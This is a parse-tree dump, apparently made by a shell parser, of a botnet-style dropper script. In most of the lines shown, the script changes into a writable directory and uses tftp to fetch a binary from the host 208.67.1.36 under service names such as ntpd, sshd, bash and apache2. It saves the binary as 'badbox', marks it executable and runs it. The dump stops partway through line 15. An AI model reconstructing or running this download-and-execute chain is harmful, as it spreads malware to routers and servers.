CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 169), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 132), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 120), word='208.67.1.36'),
    WordNode(lineno=4, pos=(121, 123), word='-c'),
    WordNode(lineno=4, pos=(124, 127), word='get'),
    WordNode(lineno=4, pos=(128, 132), word='ntpd'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(132, 133)),
  CommandNode(lineno=4, pos=(133, 149), parts=[
    WordNode(lineno=4, pos=(133, 136), word='cat'),
    WordNode(lineno=4, pos=(137, 141), word='ntpd'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(143, 149), word='badbox'), pos=(142, 149), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(149, 150)),
  CommandNode(lineno=4, pos=(150, 160), parts=[
    WordNode(lineno=4, pos=(150, 155), word='chmod'),
    WordNode(lineno=4, pos=(156, 158), word='+x'),
    WordNode(lineno=4, pos=(159, 160), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(160, 161)),
  CommandNode(lineno=4, pos=(161, 169), parts=[
    WordNode(lineno=4, pos=(161, 169), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(170, 290), parts=[
  CommandNode(lineno=5, pos=(170, 177), parts=[
    WordNode(lineno=5, pos=(170, 172), word='cd'),
    WordNode(lineno=5, pos=(173, 177), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(178, 180)),
  CommandNode(lineno=5, pos=(181, 192), parts=[
    WordNode(lineno=5, pos=(181, 183), word='cd'),
    WordNode(lineno=5, pos=(184, 192), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(193, 195)),
  CommandNode(lineno=5, pos=(196, 203), parts=[
    WordNode(lineno=5, pos=(196, 198), word='cd'),
    WordNode(lineno=5, pos=(199, 203), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(204, 206)),
  CommandNode(lineno=5, pos=(207, 215), parts=[
    WordNode(lineno=5, pos=(207, 209), word='cd'),
    WordNode(lineno=5, pos=(210, 215), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(216, 218)),
  CommandNode(lineno=5, pos=(219, 223), parts=[
    WordNode(lineno=5, pos=(219, 221), word='cd'),
    WordNode(lineno=5, pos=(222, 223), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(223, 224)),
  CommandNode(lineno=5, pos=(225, 253), parts=[
    WordNode(lineno=5, pos=(225, 229), word='tftp'),
    WordNode(lineno=5, pos=(230, 241), word='208.67.1.36'),
    WordNode(lineno=5, pos=(242, 244), word='-c'),
    WordNode(lineno=5, pos=(245, 248), word='get'),
    WordNode(lineno=5, pos=(249, 253), word='sshd'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(253, 254)),
  CommandNode(lineno=5, pos=(254, 270), parts=[
    WordNode(lineno=5, pos=(254, 257), word='cat'),
    WordNode(lineno=5, pos=(258, 262), word='sshd'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(264, 270), word='badbox'), pos=(263, 270), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(270, 271)),
  CommandNode(lineno=5, pos=(271, 281), parts=[
    WordNode(lineno=5, pos=(271, 276), word='chmod'),
    WordNode(lineno=5, pos=(277, 279), word='+x'),
    WordNode(lineno=5, pos=(280, 281), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(281, 282)),
  CommandNode(lineno=5, pos=(282, 290), parts=[
    WordNode(lineno=5, pos=(282, 290), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(291, 417), parts=[
  CommandNode(lineno=6, pos=(291, 298), parts=[
    WordNode(lineno=6, pos=(291, 293), word='cd'),
    WordNode(lineno=6, pos=(294, 298), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(299, 301)),
  CommandNode(lineno=6, pos=(302, 313), parts=[
    WordNode(lineno=6, pos=(302, 304), word='cd'),
    WordNode(lineno=6, pos=(305, 313), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(314, 316)),
  CommandNode(lineno=6, pos=(317, 324), parts=[
    WordNode(lineno=6, pos=(317, 319), word='cd'),
    WordNode(lineno=6, pos=(320, 324), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(325, 327)),
  CommandNode(lineno=6, pos=(328, 336), parts=[
    WordNode(lineno=6, pos=(328, 330), word='cd'),
    WordNode(lineno=6, pos=(331, 336), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(337, 339)),
  CommandNode(lineno=6, pos=(340, 344), parts=[
    WordNode(lineno=6, pos=(340, 342), word='cd'),
    WordNode(lineno=6, pos=(343, 344), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(344, 345)),
  CommandNode(lineno=6, pos=(346, 377), parts=[
    WordNode(lineno=6, pos=(346, 350), word='tftp'),
    WordNode(lineno=6, pos=(351, 362), word='208.67.1.36'),
    WordNode(lineno=6, pos=(363, 365), word='-c'),
    WordNode(lineno=6, pos=(366, 369), word='get'),
    WordNode(lineno=6, pos=(370, 377), word='openssh'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(377, 378)),
  CommandNode(lineno=6, pos=(378, 397), parts=[
    WordNode(lineno=6, pos=(378, 381), word='cat'),
    WordNode(lineno=6, pos=(382, 389), word='openssh'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(391, 397), word='badbox'), pos=(390, 397), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(397, 398)),
  CommandNode(lineno=6, pos=(398, 408), parts=[
    WordNode(lineno=6, pos=(398, 403), word='chmod'),
    WordNode(lineno=6, pos=(404, 406), word='+x'),
    WordNode(lineno=6, pos=(407, 408), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(408, 409)),
  CommandNode(lineno=6, pos=(409, 417), parts=[
    WordNode(lineno=6, pos=(409, 417), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(418, 538), parts=[
  CommandNode(lineno=7, pos=(418, 425), parts=[
    WordNode(lineno=7, pos=(418, 420), word='cd'),
    WordNode(lineno=7, pos=(421, 425), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(426, 428)),
  CommandNode(lineno=7, pos=(429, 440), parts=[
    WordNode(lineno=7, pos=(429, 431), word='cd'),
    WordNode(lineno=7, pos=(432, 440), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(441, 443)),
  CommandNode(lineno=7, pos=(444, 451), parts=[
    WordNode(lineno=7, pos=(444, 446), word='cd'),
    WordNode(lineno=7, pos=(447, 451), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(452, 454)),
  CommandNode(lineno=7, pos=(455, 463), parts=[
    WordNode(lineno=7, pos=(455, 457), word='cd'),
    WordNode(lineno=7, pos=(458, 463), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(464, 466)),
  CommandNode(lineno=7, pos=(467, 471), parts=[
    WordNode(lineno=7, pos=(467, 469), word='cd'),
    WordNode(lineno=7, pos=(470, 471), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(471, 472)),
  CommandNode(lineno=7, pos=(473, 501), parts=[
    WordNode(lineno=7, pos=(473, 477), word='tftp'),
    WordNode(lineno=7, pos=(478, 489), word='208.67.1.36'),
    WordNode(lineno=7, pos=(490, 492), word='-c'),
    WordNode(lineno=7, pos=(493, 496), word='get'),
    WordNode(lineno=7, pos=(497, 501), word='bash'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(501, 502)),
  CommandNode(lineno=7, pos=(502, 518), parts=[
    WordNode(lineno=7, pos=(502, 505), word='cat'),
    WordNode(lineno=7, pos=(506, 510), word='bash'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(512, 518), word='badbox'), pos=(511, 518), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(518, 519)),
  CommandNode(lineno=7, pos=(519, 529), parts=[
    WordNode(lineno=7, pos=(519, 524), word='chmod'),
    WordNode(lineno=7, pos=(525, 527), word='+x'),
    WordNode(lineno=7, pos=(528, 529), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(529, 530)),
  CommandNode(lineno=7, pos=(530, 538), parts=[
    WordNode(lineno=7, pos=(530, 538), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(539, 659), parts=[
  CommandNode(lineno=8, pos=(539, 546), parts=[
    WordNode(lineno=8, pos=(539, 541), word='cd'),
    WordNode(lineno=8, pos=(542, 546), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(547, 549)),
  CommandNode(lineno=8, pos=(550, 561), parts=[
    WordNode(lineno=8, pos=(550, 552), word='cd'),
    WordNode(lineno=8, pos=(553, 561), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(562, 564)),
  CommandNode(lineno=8, pos=(565, 572), parts=[
    WordNode(lineno=8, pos=(565, 567), word='cd'),
    WordNode(lineno=8, pos=(568, 572), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(573, 575)),
  CommandNode(lineno=8, pos=(576, 584), parts=[
    WordNode(lineno=8, pos=(576, 578), word='cd'),
    WordNode(lineno=8, pos=(579, 584), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(585, 587)),
  CommandNode(lineno=8, pos=(588, 592), parts=[
    WordNode(lineno=8, pos=(588, 590), word='cd'),
    WordNode(lineno=8, pos=(591, 592), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(592, 593)),
  CommandNode(lineno=8, pos=(594, 622), parts=[
    WordNode(lineno=8, pos=(594, 598), word='tftp'),
    WordNode(lineno=8, pos=(599, 610), word='208.67.1.36'),
    WordNode(lineno=8, pos=(611, 613), word='-c'),
    WordNode(lineno=8, pos=(614, 617), word='get'),
    WordNode(lineno=8, pos=(618, 622), word='tftp'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(622, 623)),
  CommandNode(lineno=8, pos=(623, 639), parts=[
    WordNode(lineno=8, pos=(623, 626), word='cat'),
    WordNode(lineno=8, pos=(627, 631), word='tftp'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(633, 639), word='badbox'), pos=(632, 639), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(639, 640)),
  CommandNode(lineno=8, pos=(640, 650), parts=[
    WordNode(lineno=8, pos=(640, 645), word='chmod'),
    WordNode(lineno=8, pos=(646, 648), word='+x'),
    WordNode(lineno=8, pos=(649, 650), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(650, 651)),
  CommandNode(lineno=8, pos=(651, 659), parts=[
    WordNode(lineno=8, pos=(651, 659), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(660, 780), parts=[
  CommandNode(lineno=9, pos=(660, 667), parts=[
    WordNode(lineno=9, pos=(660, 662), word='cd'),
    WordNode(lineno=9, pos=(663, 667), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(668, 670)),
  CommandNode(lineno=9, pos=(671, 682), parts=[
    WordNode(lineno=9, pos=(671, 673), word='cd'),
    WordNode(lineno=9, pos=(674, 682), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(683, 685)),
  CommandNode(lineno=9, pos=(686, 693), parts=[
    WordNode(lineno=9, pos=(686, 688), word='cd'),
    WordNode(lineno=9, pos=(689, 693), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(694, 696)),
  CommandNode(lineno=9, pos=(697, 705), parts=[
    WordNode(lineno=9, pos=(697, 699), word='cd'),
    WordNode(lineno=9, pos=(700, 705), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(706, 708)),
  CommandNode(lineno=9, pos=(709, 713), parts=[
    WordNode(lineno=9, pos=(709, 711), word='cd'),
    WordNode(lineno=9, pos=(712, 713), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(713, 714)),
  CommandNode(lineno=9, pos=(715, 743), parts=[
    WordNode(lineno=9, pos=(715, 719), word='tftp'),
    WordNode(lineno=9, pos=(720, 731), word='208.67.1.36'),
    WordNode(lineno=9, pos=(732, 734), word='-c'),
    WordNode(lineno=9, pos=(735, 738), word='get'),
    WordNode(lineno=9, pos=(739, 743), word='wget'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(743, 744)),
  CommandNode(lineno=9, pos=(744, 760), parts=[
    WordNode(lineno=9, pos=(744, 747), word='cat'),
    WordNode(lineno=9, pos=(748, 752), word='wget'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(754, 760), word='badbox'), pos=(753, 760), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(760, 761)),
  CommandNode(lineno=9, pos=(761, 771), parts=[
    WordNode(lineno=9, pos=(761, 766), word='chmod'),
    WordNode(lineno=9, pos=(767, 769), word='+x'),
    WordNode(lineno=9, pos=(770, 771), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(771, 772)),
  CommandNode(lineno=9, pos=(772, 780), parts=[
    WordNode(lineno=9, pos=(772, 780), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(781, 901), parts=[
  CommandNode(lineno=10, pos=(781, 788), parts=[
    WordNode(lineno=10, pos=(781, 783), word='cd'),
    WordNode(lineno=10, pos=(784, 788), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(789, 791)),
  CommandNode(lineno=10, pos=(792, 803), parts=[
    WordNode(lineno=10, pos=(792, 794), word='cd'),
    WordNode(lineno=10, pos=(795, 803), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(804, 806)),
  CommandNode(lineno=10, pos=(807, 814), parts=[
    WordNode(lineno=10, pos=(807, 809), word='cd'),
    WordNode(lineno=10, pos=(810, 814), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(815, 817)),
  CommandNode(lineno=10, pos=(818, 826), parts=[
    WordNode(lineno=10, pos=(818, 820), word='cd'),
    WordNode(lineno=10, pos=(821, 826), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(827, 829)),
  CommandNode(lineno=10, pos=(830, 834), parts=[
    WordNode(lineno=10, pos=(830, 832), word='cd'),
    WordNode(lineno=10, pos=(833, 834), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(834, 835)),
  CommandNode(lineno=10, pos=(836, 864), parts=[
    WordNode(lineno=10, pos=(836, 840), word='tftp'),
    WordNode(lineno=10, pos=(841, 852), word='208.67.1.36'),
    WordNode(lineno=10, pos=(853, 855), word='-c'),
    WordNode(lineno=10, pos=(856, 859), word='get'),
    WordNode(lineno=10, pos=(860, 864), word='cron'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(864, 865)),
  CommandNode(lineno=10, pos=(865, 881), parts=[
    WordNode(lineno=10, pos=(865, 868), word='cat'),
    WordNode(lineno=10, pos=(869, 873), word='cron'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(875, 881), word='badbox'), pos=(874, 881), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(881, 882)),
  CommandNode(lineno=10, pos=(882, 892), parts=[
    WordNode(lineno=10, pos=(882, 887), word='chmod'),
    WordNode(lineno=10, pos=(888, 890), word='+x'),
    WordNode(lineno=10, pos=(891, 892), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(892, 893)),
  CommandNode(lineno=10, pos=(893, 901), parts=[
    WordNode(lineno=10, pos=(893, 901), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(902, 1020), parts=[
  CommandNode(lineno=11, pos=(902, 909), parts=[
    WordNode(lineno=11, pos=(902, 904), word='cd'),
    WordNode(lineno=11, pos=(905, 909), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(910, 912)),
  CommandNode(lineno=11, pos=(913, 924), parts=[
    WordNode(lineno=11, pos=(913, 915), word='cd'),
    WordNode(lineno=11, pos=(916, 924), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(925, 927)),
  CommandNode(lineno=11, pos=(928, 935), parts=[
    WordNode(lineno=11, pos=(928, 930), word='cd'),
    WordNode(lineno=11, pos=(931, 935), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(936, 938)),
  CommandNode(lineno=11, pos=(939, 947), parts=[
    WordNode(lineno=11, pos=(939, 941), word='cd'),
    WordNode(lineno=11, pos=(942, 947), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(948, 950)),
  CommandNode(lineno=11, pos=(951, 955), parts=[
    WordNode(lineno=11, pos=(951, 953), word='cd'),
    WordNode(lineno=11, pos=(954, 955), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(955, 956)),
  CommandNode(lineno=11, pos=(957, 984), parts=[
    WordNode(lineno=11, pos=(957, 961), word='tftp'),
    WordNode(lineno=11, pos=(962, 973), word='208.67.1.36'),
    WordNode(lineno=11, pos=(974, 976), word='-c'),
    WordNode(lineno=11, pos=(977, 980), word='get'),
    WordNode(lineno=11, pos=(981, 984), word='ftp'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(984, 985)),
  CommandNode(lineno=11, pos=(985, 1000), parts=[
    WordNode(lineno=11, pos=(985, 988), word='cat'),
    WordNode(lineno=11, pos=(989, 992), word='ftp'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(994, 1000), word='badbox'), pos=(993, 1000), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1000, 1001)),
  CommandNode(lineno=11, pos=(1001, 1011), parts=[
    WordNode(lineno=11, pos=(1001, 1006), word='chmod'),
    WordNode(lineno=11, pos=(1007, 1009), word='+x'),
    WordNode(lineno=11, pos=(1010, 1011), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1011, 1012)),
  CommandNode(lineno=11, pos=(1012, 1020), parts=[
    WordNode(lineno=11, pos=(1012, 1020), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1021, 1141), parts=[
  CommandNode(lineno=12, pos=(1021, 1028), parts=[
    WordNode(lineno=12, pos=(1021, 1023), word='cd'),
    WordNode(lineno=12, pos=(1024, 1028), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1029, 1031)),
  CommandNode(lineno=12, pos=(1032, 1043), parts=[
    WordNode(lineno=12, pos=(1032, 1034), word='cd'),
    WordNode(lineno=12, pos=(1035, 1043), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1044, 1046)),
  CommandNode(lineno=12, pos=(1047, 1054), parts=[
    WordNode(lineno=12, pos=(1047, 1049), word='cd'),
    WordNode(lineno=12, pos=(1050, 1054), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1055, 1057)),
  CommandNode(lineno=12, pos=(1058, 1066), parts=[
    WordNode(lineno=12, pos=(1058, 1060), word='cd'),
    WordNode(lineno=12, pos=(1061, 1066), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1067, 1069)),
  CommandNode(lineno=12, pos=(1070, 1074), parts=[
    WordNode(lineno=12, pos=(1070, 1072), word='cd'),
    WordNode(lineno=12, pos=(1073, 1074), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1074, 1075)),
  CommandNode(lineno=12, pos=(1076, 1104), parts=[
    WordNode(lineno=12, pos=(1076, 1080), word='tftp'),
    WordNode(lineno=12, pos=(1081, 1092), word='208.67.1.36'),
    WordNode(lineno=12, pos=(1093, 1095), word='-c'),
    WordNode(lineno=12, pos=(1096, 1099), word='get'),
    WordNode(lineno=12, pos=(1100, 1104), word='pftp'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1104, 1105)),
  CommandNode(lineno=12, pos=(1105, 1121), parts=[
    WordNode(lineno=12, pos=(1105, 1108), word='cat'),
    WordNode(lineno=12, pos=(1109, 1113), word='pftp'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1115, 1121), word='badbox'), pos=(1114, 1121), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1121, 1122)),
  CommandNode(lineno=12, pos=(1122, 1132), parts=[
    WordNode(lineno=12, pos=(1122, 1127), word='chmod'),
    WordNode(lineno=12, pos=(1128, 1130), word='+x'),
    WordNode(lineno=12, pos=(1131, 1132), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1132, 1133)),
  CommandNode(lineno=12, pos=(1133, 1141), parts=[
    WordNode(lineno=12, pos=(1133, 1141), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1142, 1258), parts=[
  CommandNode(lineno=13, pos=(1142, 1149), parts=[
    WordNode(lineno=13, pos=(1142, 1144), word='cd'),
    WordNode(lineno=13, pos=(1145, 1149), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1150, 1152)),
  CommandNode(lineno=13, pos=(1153, 1164), parts=[
    WordNode(lineno=13, pos=(1153, 1155), word='cd'),
    WordNode(lineno=13, pos=(1156, 1164), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1165, 1167)),
  CommandNode(lineno=13, pos=(1168, 1175), parts=[
    WordNode(lineno=13, pos=(1168, 1170), word='cd'),
    WordNode(lineno=13, pos=(1171, 1175), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1176, 1178)),
  CommandNode(lineno=13, pos=(1179, 1187), parts=[
    WordNode(lineno=13, pos=(1179, 1181), word='cd'),
    WordNode(lineno=13, pos=(1182, 1187), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1188, 1190)),
  CommandNode(lineno=13, pos=(1191, 1195), parts=[
    WordNode(lineno=13, pos=(1191, 1193), word='cd'),
    WordNode(lineno=13, pos=(1194, 1195), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1195, 1196)),
  CommandNode(lineno=13, pos=(1197, 1223), parts=[
    WordNode(lineno=13, pos=(1197, 1201), word='tftp'),
    WordNode(lineno=13, pos=(1202, 1213), word='208.67.1.36'),
    WordNode(lineno=13, pos=(1214, 1216), word='-c'),
    WordNode(lineno=13, pos=(1217, 1220), word='get'),
    WordNode(lineno=13, pos=(1221, 1223), word='sh'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1223, 1224)),
  CommandNode(lineno=13, pos=(1224, 1238), parts=[
    WordNode(lineno=13, pos=(1224, 1227), word='cat'),
    WordNode(lineno=13, pos=(1228, 1230), word='sh'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1232, 1238), word='badbox'), pos=(1231, 1238), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1238, 1239)),
  CommandNode(lineno=13, pos=(1239, 1249), parts=[
    WordNode(lineno=13, pos=(1239, 1244), word='chmod'),
    WordNode(lineno=13, pos=(1245, 1247), word='+x'),
    WordNode(lineno=13, pos=(1248, 1249), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1249, 1250)),
  CommandNode(lineno=13, pos=(1250, 1258), parts=[
    WordNode(lineno=13, pos=(1250, 1258), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1259, 1377), parts=[
  CommandNode(lineno=14, pos=(1259, 1266), parts=[
    WordNode(lineno=14, pos=(1259, 1261), word='cd'),
    WordNode(lineno=14, pos=(1262, 1266), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1267, 1269)),
  CommandNode(lineno=14, pos=(1270, 1281), parts=[
    WordNode(lineno=14, pos=(1270, 1272), word='cd'),
    WordNode(lineno=14, pos=(1273, 1281), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1282, 1284)),
  CommandNode(lineno=14, pos=(1285, 1292), parts=[
    WordNode(lineno=14, pos=(1285, 1287), word='cd'),
    WordNode(lineno=14, pos=(1288, 1292), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1293, 1295)),
  CommandNode(lineno=14, pos=(1296, 1304), parts=[
    WordNode(lineno=14, pos=(1296, 1298), word='cd'),
    WordNode(lineno=14, pos=(1299, 1304), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1305, 1307)),
  CommandNode(lineno=14, pos=(1308, 1312), parts=[
    WordNode(lineno=14, pos=(1308, 1310), word='cd'),
    WordNode(lineno=14, pos=(1311, 1312), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1312, 1313)),
  CommandNode(lineno=14, pos=(1314, 1341), parts=[
    WordNode(lineno=14, pos=(1314, 1318), word='tftp'),
    WordNode(lineno=14, pos=(1319, 1330), word='208.67.1.36'),
    WordNode(lineno=14, pos=(1331, 1333), word='-c'),
    WordNode(lineno=14, pos=(1334, 1337), word='get'),
    WordNode(lineno=14, pos=(1338, 1341), word=' '),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1341, 1342)),
  CommandNode(lineno=14, pos=(1342, 1357), parts=[
    WordNode(lineno=14, pos=(1342, 1345), word='cat'),
    WordNode(lineno=14, pos=(1346, 1349), word=' '),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1351, 1357), word='badbox'), pos=(1350, 1357), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1357, 1358)),
  CommandNode(lineno=14, pos=(1358, 1368), parts=[
    WordNode(lineno=14, pos=(1358, 1363), word='chmod'),
    WordNode(lineno=14, pos=(1364, 1366), word='+x'),
    WordNode(lineno=14, pos=(1367, 1368), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1368, 1369)),
  CommandNode(lineno=14, pos=(1369, 1377), parts=[
    WordNode(lineno=14, pos=(1369, 1377), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1378, 1504), parts=[
  CommandNode(lineno=15, pos=(1378, 1385), parts=[
    WordNode(lineno=15, pos=(1378, 1380), word='cd'),
    WordNode(lineno=15, pos=(1381, 1385), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1386, 1388)),
  CommandNode(lineno=15, pos=(1389, 1400), parts=[
    WordNode(lineno=15, pos=(1389, 1391), word='cd'),
    WordNode(lineno=15, pos=(1392, 1400), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1401, 1403)),
  CommandNode(lineno=15, pos=(1404, 1411), parts=[
    WordNode(lineno=15, pos=(1404, 1406), word='cd'),
    WordNode(lineno=15, pos=(1407, 1411), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1412, 1414)),
  CommandNode(lineno=15, pos=(1415, 1423), parts=[
    WordNode(lineno=15, pos=(1415, 1417), word='cd'),
    WordNode(lineno=15, pos=(1418, 1423), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1424, 1426)),
  CommandNode(lineno=15, pos=(1427, 1431), parts=[
    WordNode(lineno=15, pos=(1427, 1429), word='cd'),
    WordNode(lineno=15, pos=(1430, 1431), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1431, 1432)),
  CommandNode(lineno=15, pos=(1433, 1464), parts=[
    WordNode(lineno=15, pos=(1433, 1437), word='tftp'),
    WordNode(lineno=15, pos=(1438, 1449), word='208.67.1.36'),
    WordNode(lineno=15, pos=(1450, 1452), word='-c'),
    WordNode(lineno=15, pos=(1453, 1456), word='get'),
    WordNode(lineno=15, pos=(1457, 1464), word='apache2'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1464, 1465)),
  CommandNode(lineno=15, pos=(1465, 1484), parts=[
    WordNode(lineno=15, pos=(1465, 1468), word='cat'),
    WordNode(lineno=15, pos=(1469, 1476), word='apache2'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1478, 1484), word='badbox'), pos=(1477, 1484), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1484, 1485)),
  CommandNode(lineno=15, pos=(1485, 1495), parts=[
    WordNode(lineno=15, pos=(1485, 1490), word='chmod'),
    WordNode(lineno=15, pos=(1491, 1493), word='+x'),
    WordNode(lineno=15, pos=(1494, 1495), word='*'),
  ]),
